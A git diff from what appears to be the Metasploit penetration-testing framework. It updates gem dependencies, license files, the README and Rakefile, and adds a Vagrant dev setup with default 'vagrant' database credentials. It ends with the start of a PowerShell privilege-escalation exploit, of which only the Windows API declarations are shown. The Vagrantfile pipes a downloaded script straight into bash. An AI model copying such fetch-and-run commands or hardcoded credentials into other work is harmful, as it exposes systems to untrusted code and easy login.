+      activesupport (= 4.2.9)
      arel (~> 6.0)
-    activesupport (4.2.6)
+    activesupport (4.2.9)
      i18n (~> 0.7)
-      json (~> 1.7, >= 1.7.7)
      minitest (~> 5.1)
      thread_safe (~> 0.3, >= 0.3.4)
      tzinfo (~> 1.1)
-    addressable (2.4.0)
-    arel (6.0.3)
-    arel-helpers (2.3.0)
+    addressable (2.5.2)
+      public_suffix (>= 2.0.2, < 4.0)
+    afm (0.2.2)
+    arel (6.0.4)
+    arel-helpers (2.4.0)
      activerecord (>= 3.1.0, < 6)
-    aruba (0.14.1)
-      childprocess (~> 0.5.6)
-      contracts (~> 0.9)
-      cucumber (>= 1.3.19)
-      ffi (~> 1.9.10)
-      rspec-expectations (>= 2.99)
-      thor (~> 0.19)
+    backports (3.8.0)
    bcrypt (3.1.11)
-    builder (3.2.2)
-    capybara (2.7.1)
-      addressable
-      mime-types (>= 1.16)
-      nokogiri (>= 1.3.3)
-      rack (>= 1.0.0)
-      rack-test (>= 0.5.4)
-      xpath (~> 2.0)
-    childprocess (0.5.9)
-      ffi (~> 1.0, >= 1.0.11)
+    bcrypt_pbkdf (1.0.0)
+    bindata (2.4.0)
+    bit-struct (0.16)
+    builder (3.2.3)
    coderay (1.1.1)
-    contracts (0.14.0)
-    cucumber (2.3.3)
-      builder (>= 2.1.2)
-      cucumber-core (~> 1.4.0)
-      cucumber-wire (~> 0.0.1)
-      diff-lcs (>= 1.1.3)
-      gherkin (~> 3.2.0)
-      multi_json (>= 1.7.5, < 2.0)
-      multi_test (>= 0.1.2)
-    cucumber-core (1.4.0)
-      gherkin (~> 3.2.0)
-    cucumber-rails (1.4.3)
-      capybara (>= 1.1.2, < 3)
-      cucumber (>= 1.3.8, < 3)
-      mime-types (>= 1.16, < 4)
-      nokogiri (~> 1.5)
-      railties (>= 3, < 5)
-    cucumber-wire (0.0.1)
-    diff-lcs (1.2.5)
+    diff-lcs (1.3)
+    dnsruby (1.60.2)
    docile (1.1.5)
    erubis (2.7.0)
-    factory_girl (4.7.0)
+    factory_girl (4.8.0)
      activesupport (>= 3.0.0)
-    factory_girl_rails (4.7.0)
-      factory_girl (~> 4.7.0)
+    factory_girl_rails (4.8.0)
+      factory_girl (~> 4.8.0)
      railties (>= 3.0.0)
-    faraday (0.9.2)
+    faraday (0.13.1)
      multipart-post (>= 1.2, < 3)
-    ffi (1.9.10)
+    ffi (1.9.18)
    filesize (0.1.1)
-    fivemat (1.3.2)
-    gherkin (3.2.0)
-    i18n (0.7.0)
-    jsobfu (0.4.1)
-      rkelly-remix (= 0.0.6)
-    json (1.8.3)
+    fivemat (1.3.5)
+    hashery (2.1.2)
+    i18n (0.8.6)
+    jsobfu (0.4.2)
+      rkelly-remix
+    json (2.1.0)
    loofah (2.0.3)
      nokogiri (>= 1.5.9)
-    metasm (1.0.2)
-    metasploit-concern (2.0.1)
+    metasm (1.0.3)
+    metasploit-concern (2.0.5)
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-credential (2.0.1)
+    metasploit-credential (2.0.12)
      metasploit-concern
      metasploit-model
      metasploit_data_models
      pg
      railties
+      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (2.0.0)
+    metasploit-model (2.0.4)
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.1.11)
-    metasploit_data_models (2.0.0)
+    metasploit-payloads (1.3.1)
+    metasploit_data_models (2.0.15)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
      arel-helpers
@@ -152,120 +162,188 @@ GEM
      postgres_ext
      railties (~> 4.2.6)
      recog (~> 2.0)
+    metasploit_payloads-mettle (0.2.2)
    method_source (0.8.2)
-    mime-types (3.0)
-      mime-types-data (~> 3.2015)
-    mime-types-data (3.2016.0221)
-    mini_portile2 (2.0.0)
-    minitest (5.8.4)
-    msgpack (0.7.6)
-    multi_json (1.12.0)
-    multi_test (0.1.2)
+    mini_portile2 (2.2.0)
+    minitest (5.10.3)
+    msgpack (1.1.0)
    multipart-post (2.0.0)
+    nessus_rest (0.1.6)
+    net-ssh (4.1.0)
    network_interface (0.0.1)
-    nokogiri (1.6.7.2)
-      mini_portile2 (~> 2.0.0.rc2)
-    octokit (4.3.0)
-      sawyer (~> 0.7.0, >= 0.5.3)
+    nexpose (6.1.1)
+    nokogiri (1.8.0)
+      mini_portile2 (~> 2.2.0)
+    octokit (4.7.0)
+      sawyer (~> 0.8.0, >= 0.5.3)
    openssl-ccm (1.2.1)
-    packetfu (1.1.11)
-      network_interface (~> 0.0)
-      pcaprub (~> 0.12)
+    openvas-omp (0.0.4)
+    packetfu (1.1.13)
+      pcaprub
    patch_finder (1.0.2)
    pcaprub (0.12.4)
-    pg (0.18.4)
+    pdf-reader (2.0.0)
+      Ascii85 (~> 1.0.0)
+      afm (~> 0.2.1)
+      hashery (~> 2.0)
+      ruby-rc4
+      ttfunk
+    pg (0.20.0)
    pg_array_parser (0.0.9)
    postgres_ext (3.0.0)
      activerecord (>= 4.0.0)
      arel (>= 4.0.1)
      pg_array_parser (~> 0.0.9)
-    pry (0.10.3)
+    pry (0.10.4)
      coderay (~> 1.1.0)
      method_source (~> 0.8.1)
      slop (~> 3.4)
-    rack (1.6.4)
+    public_suffix (3.0.0)
+    rack (1.6.8)
    rack-test (0.6.3)
      rack (>= 1.0)
    rails-deprecated_sanitizer (1.0.3)
      activesupport (>= 4.2.0.alpha)
-    rails-dom-testing (1.0.7)
+    rails-dom-testing (1.0.8)
      activesupport (>= 4.2.0.beta, < 5.0)
-      nokogiri (~> 1.6.0)
+      nokogiri (~> 1.6)
      rails-deprecated_sanitizer (>= 1.0.1)
    rails-html-sanitizer (1.0.3)
      loofah (~> 2.0)
-    railties (4.2.6)
-      actionpack (= 4.2.6)
-      activesupport (= 4.2.6)
+    railties (4.2.9)
+      actionpack (= 4.2.9)
+      activesupport (= 4.2.9)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
-    rake (11.1.2)
-    rb-readline-r7 (0.5.2.0)
-    recog (2.0.21)
+    rake (12.0.0)
+    rb-readline (0.5.5)
+    rbnacl (4.0.2)
+      ffi
+    rbnacl-libsodium (1.0.13)
+      rbnacl (>= 3.0.1)
+    recog (2.1.12)
      nokogiri
-    redcarpet (3.3.4)
-    rkelly-remix (0.0.6)
+    redcarpet (3.4.0)
+    rex-arch (0.1.11)
+      rex-text
+    rex-bin_tools (0.1.4)
+      metasm
+      rex-arch
+      rex-core
+      rex-struct2
+      rex-text
+    rex-core (0.1.12)
+    rex-encoder (0.1.4)
+      metasm
+      rex-arch
+      rex-text
+    rex-exploitation (0.1.14)
+      jsobfu
+      metasm
+      rex-arch
+      rex-encoder
+      rex-text
+    rex-java (0.1.5)
+    rex-mime (0.1.5)
+      rex-text
+    rex-nop (0.1.1)
+      rex-arch
+    rex-ole (0.1.6)
+      rex-text
+    rex-powershell (0.1.72)
+      rex-random_identifier
+      rex-text
+    rex-random_identifier (0.1.3)
+      rex-text
+    rex-registry (0.1.3)
+    rex-rop_builder (0.1.3)
+      metasm
+      rex-core
+      rex-text
+    rex-socket (0.1.8)
+      rex-core
+    rex-sslscan (0.1.5)
+      rex-core
+      rex-socket
+      rex-text
+    rex-struct2 (0.1.2)
+    rex-text (0.2.15)
+    rex-zip (0.1.3)
+      rex-text
+    rkelly-remix (0.0.7)
    robots (0.10.1)
-    rspec-core (3.4.4)
-      rspec-support (~> 3.4.0)
-    rspec-expectations (3.4.0)
+    rspec (3.6.0)
+      rspec-core (~> 3.6.0)
+      rspec-expectations (~> 3.6.0)
+      rspec-mocks (~> 3.6.0)
+    rspec-core (3.6.0)
+      rspec-support (~> 3.6.0)
+    rspec-expectations (3.6.0)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.4.0)
-    rspec-mocks (3.4.1)
+      rspec-support (~> 3.6.0)
+    rspec-mocks (3.6.0)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.4.0)
-    rspec-rails (3.4.2)
-      actionpack (>= 3.0, < 4.3)
-      activesupport (>= 3.0, < 4.3)
-      railties (>= 3.0, < 4.3)
-      rspec-core (~> 3.4.0)
-      rspec-expectations (~> 3.4.0)
-      rspec-mocks (~> 3.4.0)
-      rspec-support (~> 3.4.0)
-    rspec-support (3.4.1)
-    rubyntlm (0.6.0)
-    rubyzip (1.2.0)
-    sawyer (0.7.0)
-      addressable (>= 2.3.5, < 2.5)
-      faraday (~> 0.8, < 0.10)
-    shoulda-matchers (3.1.1)
-      activesupport (>= 4.0.0)
-    simplecov (0.11.2)
+      rspec-support (~> 3.6.0)
+    rspec-rails (3.6.1)
+      actionpack (>= 3.0)
+      activesupport (>= 3.0)
+      railties (>= 3.0)
+      rspec-core (~> 3.6.0)
+      rspec-expectations (~> 3.6.0)
+      rspec-mocks (~> 3.6.0)
+      rspec-support (~> 3.6.0)
+    rspec-rerun (1.1.0)
+      rspec (~> 3.0)
+    rspec-support (3.6.0)
+    ruby-rc4 (0.1.5)
+    ruby_smb (0.0.18)
+      bindata
+      rubyntlm
+      windows_error
+    rubyntlm (0.6.2)
+    rubyzip (1.2.1)
+    sawyer (0.8.1)
+      addressable (>= 2.3.5, < 2.6)
+      faraday (~> 0.8, < 1.0)
+    simplecov (0.15.0)
      docile (~> 1.1.0)
-      json (~> 1.8)
+      json (>= 1.8, < 3)
      simplecov-html (~> 0.10.0)
-    simplecov-html (0.10.0)
+    simplecov-html (0.10.2)
    slop (3.6.0)
-    sqlite3 (1.3.11)
-    thor (0.19.1)
-    thread_safe (0.3.5)
-    timecop (0.8.1)
-    tzinfo (1.2.2)
+    sqlite3 (1.3.13)
+    sshkey (1.9.0)
+    thor (0.20.0)
+    thread_safe (0.3.6)
+    timecop (0.9.1)
+    ttfunk (1.5.1)
+    tzinfo (1.2.3)
      thread_safe (~> 0.1)
-    tzinfo-data (1.2016.4)
+    tzinfo-data (1.2017.2)
      tzinfo (>= 1.0.0)
-    xpath (2.0.0)
-      nokogiri (~> 1.3)
-    yard (0.8.7.6)
+    windows_error (0.1.2)
+    xdr (2.0.0)
+      activemodel (>= 4.2.7)
+      activesupport (>= 4.2.7)
+    xmlrpc (0.3.0)
+    yard (0.9.9)

 PLATFORMS
  ruby

 DEPENDENCIES
-  aruba
-  cucumber-rails
  factory_girl_rails
  fivemat
  metasploit-framework!
-  octokit (~> 4.0)
+  octokit
  pry
  rake
  redcarpet
  rspec-rails
-  shoulda-matchers
+  rspec-rerun
  simplecov
  timecop
  yard

 BUNDLED WITH
-   1.12.4
+   1.15.4
@@ -2,7 +2,7 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: http://www.metasploit.com/

 Files: *
-Copyright: 2006-2016, Rapid7, Inc.
+Copyright: 2006-2017, Rapid7, Inc.
 License: BSD-3-clause

 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -19,19 +19,6 @@ Files: data/templates/to_mem_pshreflection.ps1.template
 Copyright: 2012, Matthew Graeber
 License: BSD-3-clause

-Files: data/john/*
-Copyright: 1996-2011 Solar Designer.
-License: GPL-2
-
-Files: external/pcaprub/*
-Copyright: 2007-2008, Alastair Houghton
-License: LGPL-2.1
-
-Files: external/ruby-kissfft/*
-Copyright: 2003-2010 Mark Borgerding
-           2009-2012 H D Moore <hdm[at]rapid7.com>
-License: BSD-3-clause
-
 Files: external/source/exploits/IE11SandboxEscapes/*
 Copyright: James Forshaw, 2014
 License: GPLv3
@@ -79,38 +66,18 @@ Files: lib/anemone.rb lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT

-Files: lib/bit-struct.rb lib/bit-struct/*
-Copyright: 2005-2009, Joel VanderWerf
-License: Ruby
-
 Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
 Copyright: 2006-2010 Yoann GUILLOT
 License: LGPL-2.1

-Files: lib/nessus/*
-Copyright: Vlatoko Kosturjak
-License: BSD-3-clause
-
 Files: lib/net/dns.rb lib/net/dns/*
 Copyright: 2006 Marco Ceresa
 License: Ruby

-Files: lib/net/ssh.rb lib/net/ssh/*
-Copyright: 2008 Jamis Buck <jamis@37signals.com>
-License: MIT
-
-Files: lib/packetfu.rb lib/packetfu/*
-Copyright: 2008-2012 Tod Beardsley
-License: BSD-3-clause
-
 Files: lib/postgres_msf.rb lib/postgres/postgres-pr/message.rb lib/postgres/postgres-pr/connection.rb
 Copyright: 2005 Michael Neumann
 License: BSD-3-clause or Ruby

-Files: lib/openvas/*
-Copyright: No copyright statement provided
-License: MIT
-
 Files: lib/rabal/*
 Copyright: Jeremy Hinegadner <jeremy at hinegardner dot org>
 License: Ruby
@@ -119,22 +86,10 @@ Files: lib/rbmysql.rb lib/rbmysql/*
 Copyright: 2009 tommy
 License: Ruby

-Files: lib/rbreadline.rb
-Copyright: 2009 Park Heesob
-License: BSD-3-clause
-
-Files: lib/rkelly/*
-Copyright: 2007, 2008, 2009 Aaron Patternson, John Barnette
-License: MIT
-
 Files: lib/snmp.rb lib/snmp/*
 Copyright: 2004, David R. Halliday
 License: Ruby

-Files: lib/sshkey.rb lib/sshkey/*
-Copyright: 2011 James Miller
-License: MIT
-
 Files: lib/windows_console_color_support.rb
 Copyright: 2011 Michael 'mihi' Schierl
 License: BSD-3-clause
@@ -151,132 +106,6 @@ Files: data/webcam/api.js
 Copyright: Copyright 2013 Muaz Khan<@muazkh>.
 License: MIT

-
-#
-# Gems
-#
-
-Files: activemodel
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: activerecord
-Copyright: 2004-2011 David Heinemeier Hansson
-License: MIT
-
-Files: activesupport
-Copyright: 2005-2011 David Heinemeier Hansson
-License: MIT
-
-Files: arel
-Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
-License: MIT
-
-Files: bcrypt
-Copyright: 2007-2011 Coda Hale
-License: MIT
-
-Files: builder
-Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
-License: MIT
-
-Files: database_cleaner
-Copyright: 2009 Ben Mabey
-License: MIT
-
-Files: diff-lcs
-Copyright: 2004-2011 Austin Ziegler
-License: MIT
-
-Files: factory_girl
-Copyright: 2008-2013 Joe Ferris and thoughtbot, inc.
-License: MIT
-
-Files: fivemat
-Copyright: 2012 Tim Pope
-License: MIT
-
-Files: i18n
-Copyright: 2008 The Ruby I18n team
-License: MIT
-
-Files: json
-Copyright: Daniel Luz <dev at mernen dot com>
-License: Ruby
-
-Files: metasploit_data_models
-Copyright: 2012 Rapid7, Inc.
-License: MIT
-
-Files: mini_portile
-Copyright: 2011 Luis Lavena
-License: MIT
-
-Files: msgpack
-Copyright: Austin Ziegler
-License: Ruby
-
-Files: multi_json
-Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
-License: MIT
-
-Files: network_interface
-Copyright: 2012, Rapid7, Inc.
-License: MIT
-
-Files: nokogiri
-Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
-License: MIT
-
-Files: packetfu
-Copyright: 2008-2012 Tod Beardsley
-License: BSD-3-clause
-
-Files: pcaprub
-Copyright: 2007-2008, Alastair Houghton
-License: LGPL-2.1
-
-Files: pg
-Copyright: 1997-2012 by the authors
-License: Ruby
-
-Files: rake
-Copyright: 2003, 2004 Jim Weirich
-License: MIT
-
-Files: redcarpet
-Copyright: 2009 Natacha Porté
-License: MIT
-
-Files: robots
-Copyright: 2008 Kyle Maxwell, contributors
-License: MIT
-
-Files: rspec
-Copyright: 2009 Chad Humphries, David Chelimsky
-License: MIT
-
-Files: shoulda-matchers
-Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc.
-License: MIT
-
-Files: simplecov
-Copyright: 2010-2012 Christoph Olszowka
-License: MIT
-
-Files: timecop
-Copyright: 2012 Travis Jeffery, John Trupiano
-License: MIT
-
-Files: tzinfo
-Copyright: 2005-2006 Philip Ross
-License: MIT
-
-Files: yard
-Copyright: 2007-2013 Loren Segal
-License: MIT
-
-
 License: BSD-2-clause
 Redistribution and use in source and binary forms, with or without modification,
 are permitted provided that the following conditions are met:
@@ -0,0 +1,130 @@
+This file is auto-generated by tools/dev/update_gem_licenses.sh
+Ascii85, 1.0.2, MIT
+actionpack, 4.2.9, MIT
+actionview, 4.2.9, MIT
+activemodel, 4.2.9, MIT
+activerecord, 4.2.9, MIT
+activesupport, 4.2.9, MIT
+addressable, 2.5.1, "Apache 2.0"
+afm, 0.2.2, MIT
+arel, 6.0.4, MIT
+arel-helpers, 2.4.0, unknown
+backports, 3.8.0, MIT
+bcrypt, 3.1.11, MIT
+bindata, 2.4.0, ruby
+bit-struct, 0.16, ruby
+builder, 3.2.3, MIT
+bundler, 1.15.1, MIT
+coderay, 1.1.1, MIT
+diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
+dnsruby, 1.60.1, "Apache 2.0"
+docile, 1.1.5, MIT
+erubis, 2.7.0, MIT
+factory_girl, 4.8.0, MIT
+factory_girl_rails, 4.8.0, MIT
+faraday, 0.12.1, MIT
+filesize, 0.1.1, MIT
+fivemat, 1.3.5, MIT
+google-protobuf, 3.3.0, "New BSD"
+googleauth, 0.5.1, "Apache 2.0"
+grpc, 1.4.1, "New BSD"
+hashery, 2.1.2, "Simplified BSD"
+i18n, 0.8.6, MIT
+jsobfu, 0.4.2, "New BSD"
+json, 2.1.0, ruby
+jwt, 1.5.6, MIT
+little-plugger, 1.1.4, MIT
+logging, 2.2.2, MIT
+loofah, 2.0.3, MIT
+memoist, 0.16.0, MIT
+metasm, 1.0.3, LGPL
+metasploit-aggregator, 0.2.1, "New BSD"
+metasploit-concern, 2.0.5, "New BSD"
+metasploit-credential, 2.0.10, "New BSD"
+metasploit-framework, 4.15.0, "New BSD"
+metasploit-model, 2.0.4, "New BSD"
+metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 2.0.15, "New BSD"
+metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
+method_source, 0.8.2, MIT
+mini_portile2, 2.2.0, MIT
+minitest, 5.10.2, MIT
+msgpack, 1.1.0, "Apache 2.0"
+multi_json, 1.12.1, MIT
+multipart-post, 2.0.0, MIT
+nessus_rest, 0.1.6, MIT
+net-ssh, 4.1.0, MIT
+network_interface, 0.0.1, MIT
+nexpose, 6.1.0, BSD
+nokogiri, 1.8.0, MIT
+octokit, 4.7.0, MIT
+openssl-ccm, 1.2.1, MIT
+openvas-omp, 0.0.4, MIT
+os, 0.9.6, MIT
+packetfu, 1.1.13, BSD
+patch_finder, 1.0.2, "New BSD"
+pcaprub, 0.12.4, LGPL-2.1
+pdf-reader, 2.0.0, MIT
+pg, 0.20.0, "New BSD"
+pg_array_parser, 0.0.9, unknown
+postgres_ext, 3.0.0, MIT
+pry, 0.10.4, MIT
+public_suffix, 2.0.5, MIT
+rack, 1.6.8, MIT
+rack-test, 0.6.3, MIT
+rails-deprecated_sanitizer, 1.0.3, MIT
+rails-dom-testing, 1.0.8, MIT
+rails-html-sanitizer, 1.0.3, MIT
+railties, 4.2.9, MIT
+rake, 12.0.0, MIT
+rb-readline, 0.5.4, BSD
+recog, 2.1.11, unknown
+redcarpet, 3.4.0, MIT
+rex-arch, 0.1.9, "New BSD"
+rex-bin_tools, 0.1.4, "New BSD"
+rex-core, 0.1.11, "New BSD"
+rex-encoder, 0.1.4, "New BSD"
+rex-exploitation, 0.1.14, "New BSD"
+rex-java, 0.1.5, "New BSD"
+rex-mime, 0.1.5, "New BSD"
+rex-nop, 0.1.1, "New BSD"
+rex-ole, 0.1.6, "New BSD"
+rex-powershell, 0.1.72, "New BSD"
+rex-random_identifier, 0.1.2, "New BSD"
+rex-registry, 0.1.3, "New BSD"
+rex-rop_builder, 0.1.3, "New BSD"
+rex-socket, 0.1.8, "New BSD"
+rex-sslscan, 0.1.4, "New BSD"
+rex-struct2, 0.1.2, "New BSD"
+rex-text, 0.2.15, "New BSD"
+rex-zip, 0.1.3, "New BSD"
+rkelly-remix, 0.0.7, MIT
+robots, 0.10.1, MIT
+rspec, 3.6.0, MIT
+rspec-core, 3.6.0, MIT
+rspec-expectations, 3.6.0, MIT
+rspec-mocks, 3.6.0, MIT
+rspec-rails, 3.6.0, MIT
+rspec-rerun, 1.1.0, MIT
+rspec-support, 3.6.0, MIT
+ruby-rc4, 0.1.5, MIT
+ruby_smb, 0.0.18, "New BSD"
+rubyntlm, 0.6.2, MIT
+rubyzip, 1.2.1, "Simplified BSD"
+sawyer, 0.8.1, MIT
+signet, 0.7.3, "Apache 2.0"
+simplecov, 0.14.1, MIT
+simplecov-html, 0.10.1, MIT
+slop, 3.6.0, MIT
+sqlite3, 1.3.13, "New BSD"
+sshkey, 1.9.0, MIT
+thor, 0.19.4, MIT
+thread_safe, 0.3.6, "Apache 2.0"
+timecop, 0.9.1, MIT
+ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
+tzinfo, 1.2.3, MIT
+tzinfo-data, 1.2017.2, MIT
+windows_error, 0.1.2, BSD
+xdr, 2.0.0, "Apache 2.0"
+xmlrpc, 0.3.0, ruby
+yard, 0.9.9, MIT
@@ -9,20 +9,19 @@ Bug tracking and development information can be found at:
 https://github.com/rapid7/metasploit-framework

 New bugs and feature requests should be directed to:
-  http://r-7.co/MSF-BUGv1
+  https://r-7.co/MSF-BUGv1

 API documentation for writing modules can be found at:
  https://rapid7.github.io/metasploit-framework/api

-Questions and suggestions can be sent to:
-  https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
+Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list

 Installing
 --

-Generally, you should use [the free installer](https://www.metasploit.com/download),
+Generally, you should use [the free installer](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers),
 which contains all of the dependencies and will get you up and running with a
-few clicks. See the [Dev Environment Setup](http://r-7.co/MSF-DEV) if
+few clicks. See the [Dev Environment Setup](https://r-7.co/MSF-DEV) if
 you'd like to deal with dependencies on your own.

 Using Metasploit
@@ -45,6 +44,6 @@ pull request. For slightly more information, see
 [wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment "Metasploit Development Environment Setup"
 [wiki-start]: https://github.com/rapid7/metasploit-framework/wiki/ "Metasploit Wiki"
 [wiki-usage]: https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit "Using Metasploit"
-[unleashed]: http://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"
+[unleashed]: https://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"


@@ -9,6 +9,20 @@ require 'metasploit/framework/spec/untested_payloads'
 # the user installs with `bundle install --without db`
 Metasploit::Framework::Require.optionally_active_record_railtie

+begin
+  require 'rspec/core'
+  require 'rspec-rerun/tasks'
+rescue LoadError
+  puts "rspec not in bundle, so can't set up spec tasks.  " \
+       "To run specs ensure to install the development and test groups."
+  puts "Bundle currently installed '--without #{Bundler.settings.without.join(' ')}'."
+  puts "To clear the without option do `bundle install --without ''` (the --without flag with an empty string) or " \
+       "`rm -rf .bundle` to remove the .bundle/config manually and then `bundle install`"
+else
+  require 'rspec/core/rake_task'
+  RSpec::Core::RakeTask.new(spec: 'db:test:prepare')
+end
+
 Metasploit::Framework::Application.load_tasks
 Metasploit::Framework::Spec::Constants.define_task
 Metasploit::Framework::Spec::Threads::Suite.define_task
@@ -0,0 +1,47 @@
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+
+Vagrant.configure(2) do |config|
+  config.ssh.forward_x11 = true
+  config.vm.box = "ubuntu/xenial64"
+  config.vm.network :forwarded_port, guest: 4444, host: 4444
+  config.vm.provider "vmware" do |v|
+	  v.memory = 2048
+	  v.cpus = 2
+  end
+  config.vm.provider "virtualbox" do |v|
+	  v.memory = 2048
+	  v.cpus = 2
+  end
+  %w(.vimrc .gitconfig).each do |f|
+    local = File.expand_path "~/#{f}"
+    if File.exist? local
+      config.vm.provision "file", source: local, destination: f
+    end
+  end
+
+  [ #"echo 127.0.1.1 `cat /etc/hostname` >> /etc/hosts", work around a bug in official Ubuntu Xenial cloud images
+    "apt-get update",
+    "apt-get dist-upgrade -y",
+    "apt-get -y install curl build-essential git tig vim john nmap libpq-dev libpcap-dev gnupg2 fortune postgresql postgresql-contrib",
+  ].each do |step|
+    config.vm.provision "shell", inline: step
+  end
+
+  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
+    "curl -L https://get.rvm.io | bash -s stable",
+    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
+    "source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
+    "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
+    "mkdir -p ~/.msf4",
+  ].each do |step|
+    config.vm.provision "shell", privileged: false, inline: step
+  end
+  config.vm.provision "file", source: "config/database.yml.vagrant", destination: "~/.msf4/database.yml"
+
+  config.vm.provision "shell", inline: "sudo -u postgres psql postgres -tAc \"SELECT 1 FROM pg_roles WHERE rolname='vagrant'\" | grep -q 1 || sudo -u postgres createuser -s -e -w vagrant && sudo -u postgres psql -c \"ALTER USER vagrant with ENCRYPTED PASSWORD 'vagrant';\""
+
+  ["msf_dev_db", "msf_test_db"].each do |database|
+    config.vm.provision "shell", inline: "sudo -u postgres psql -lqt | awk '{ print $1 }' | grep -w #{database} | wc -l | grep -q 1 || sudo -u postgres createdb --owner vagrant #{database}"
+  end
+end
@@ -0,0 +1,18 @@
+development: &pgsql
+  adapter: postgresql
+  database: msf_dev_db
+  username: vagrant
+  password: vagrant
+  host: localhost
+  port: 5432
+  pool: 200
+  timeout: 5
+
+production: &production
+  <<: *pgsql
+
+test:
+  <<: *pgsql
+  database: msf_test_db
+  username: vagrant
+  wassword: vagrant
@@ -0,0 +1,347 @@
+# Copyright (c) 2016, Ruben Booren (@FuzzySec)
+# All rights reserved
+Add-Type -TypeDefinition @"
+    using System;
+    using System.Diagnostics;
+    using System.Runtime.InteropServices;
+    using System.Security.Principal;
+
+    [StructLayout(LayoutKind.Sequential)]
+    public struct PROCESS_INFORMATION
+    {
+        public IntPtr hProcess;
+        public IntPtr hThread;
+        public int dwProcessId;
+        public int dwThreadId;
+    }
+
+    [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
+    public struct STARTUPINFO
+    {
+        public Int32 cb;
+        public string lpReserved;
+        public string lpDesktop;
+        public string lpTitle;
+        public Int32 dwX;
+        public Int32 dwY;
+        public Int32 dwXSize;
+        public Int32 dwYSize;
+        public Int32 dwXCountChars;
+        public Int32 dwYCountChars;
+        public Int32 dwFillAttribute;
+        public Int32 dwFlags;
+        public Int16 wShowWindow;
+        public Int16 cbReserved2;
+        public IntPtr lpReserved2;
+        public IntPtr hStdInput;
+        public IntPtr hStdOutput;
+        public IntPtr hStdError;
+    }
+
+    [StructLayout(LayoutKind.Sequential)]
+    public struct SQOS
+    {
+        public int Length;
+        public int ImpersonationLevel;
+        public int ContextTrackingMode;
+        public bool EffectiveOnly;
+    }
+
+    public static class Advapi32
+    {
+        [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
+        public static extern bool CreateProcessWithLogonW(
+            String userName,
+            String domain,
+            String password,
+            int logonFlags,
+            String applicationName,
+            String commandLine,
+            int creationFlags,
+            int environment,
+            String currentDirectory,
+            ref  STARTUPINFO startupInfo,
+            out PROCESS_INFORMATION processInformation);
+
+        [DllImport("advapi32.dll", SetLastError=true)]
+        public static extern bool SetThreadToken(
+            ref IntPtr Thread,
+            IntPtr Token);
+
+        [DllImport("advapi32.dll", SetLastError=true)]
+        public static extern bool OpenThreadToken(
+            IntPtr ThreadHandle,
+            int DesiredAccess,
+            bool OpenAsSelf,
+            out IntPtr TokenHandle);
+
+        [DllImport("advapi32.dll", SetLastError=true)]
+        public static extern bool OpenProcessToken(
+            IntPtr ProcessHandle,
+            int DesiredAccess,
+            ref IntPtr TokenHandle);
+
+        [DllImport("advapi32.dll", SetLastError=true)]
+        public extern static bool DuplicateToken(
+            IntPtr ExistingTokenHandle,
+            int SECURITY_IMPERSONATION_LEVEL,
+            ref IntPtr DuplicateTokenHandle);
+    }
+
+    public static class Kernel32
+    {
+        [DllImport("kernel32.dll")]
+        public static extern uint GetLastError();
+
+        [DllImport("kernel32.dll", SetLastError=true)]
+        public static extern IntPtr GetCurrentProcess();
+
+        [DllImport("kernel32.dll", SetLastError=true)]
+        public static extern IntPtr GetCurrentThread();
+
+        [DllImport("kernel32.dll", SetLastError=true)]
+        public static extern int GetThreadId(IntPtr hThread);
+
+        [DllImport("kernel32.dll", SetLastError = true)]
+        public static extern int GetProcessIdOfThread(IntPtr handle);
+
+        [DllImport("kernel32.dll",SetLastError=true)]
+        public static extern int SuspendThread(IntPtr hThread);
+
+        [DllImport("kernel32.dll",SetLastError=true)]
+        public static extern int ResumeThread(IntPtr hThread);
+
+        [DllImport("kernel32.dll", SetLastError=true)]
+        public static extern bool TerminateProcess(
+            IntPtr hProcess,
+            uint uExitCode);
+
+        [DllImport("kernel32.dll", SetLastError=true)]
+        public static extern bool CloseHandle(IntPtr hObject);
+
+        [DllImport("kernel32.dll", SetLastError=true)]
+        public static extern bool DuplicateHandle(
+            IntPtr hSourceProcessHandle,
+            IntPtr hSourceHandle,
+            IntPtr hTargetProcessHandle,
+            ref IntPtr lpTargetHandle,
+            int dwDesiredAccess,
+            bool bInheritHandle,
+            int dwOptions);
+    }
+
